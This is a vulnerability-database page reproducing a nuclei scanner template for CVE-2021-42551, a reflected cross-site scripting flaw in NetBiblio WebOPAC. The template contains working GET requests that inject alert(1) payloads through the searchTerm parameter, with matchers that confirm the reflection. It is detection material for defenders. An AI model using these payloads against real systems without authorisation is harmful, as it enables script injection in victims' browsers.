Lucene search
K

NetBiblio WebOPAC - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 74 Views

NetBiblio WebOPAC XSS - Reflected cross-site scripting vulnerability in Wikipedia modul

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-42551
14 Jan 202210:15
attackerkb
Circl
CVE-2021-42551
14 Jan 202212:19
circl
CNNVD
AlCoda NetBiblio WebOpac 跨站脚本漏洞
14 Jan 202200:00
cnnvd
CVE
CVE-2021-42551
14 Jan 202209:52
cve
Cvelist
CVE-2021-42551 Reflected XSS in NetBiblio WebOPAC search functionality
14 Jan 202209:52
cvelist
EUVD
EUVD-2021-29519
3 Oct 202520:07
euvd
NVD
CVE-2021-42551
14 Jan 202210:15
nvd
OSV
CVE-2021-42551
14 Jan 202210:15
osv
Prion
Cross site scripting
14 Jan 202210:15
prion
RedhatCVE
CVE-2021-42551
22 May 202518:51
redhatcve
Rows per page
id: CVE-2021-42551

info:
  name: NetBiblio WebOPAC - Cross-Site Scripting
  author: compr00t
  severity: medium
  description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42551
    - https://www.redguard.ch/advisories/netbiblio_webopac.txt
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/compr00t/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-42551
    cwe-id: CWE-79
    epss-score: 0.02671
    epss-percentile: 0.83944
    cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: alcoda
    product: netbiblio
  tags: cve2021,cve,xss,netbiblio,alcoda,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x'
      - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F'

    host-redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SearchTerm: 'x'+alert(1)+'x',"
          - "SearchTerm: 'x\\\\'+alert(1),//',"
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "NetBiblio"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e47547594ef5fee8d37f1b5429d577f8f8bf8ece7a5bb2a86cbceeb36550368c0220721ec03b3bd403b525aae9207c0f315855892cfbf6cbcc38063a1295ce8b1996:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.02671
74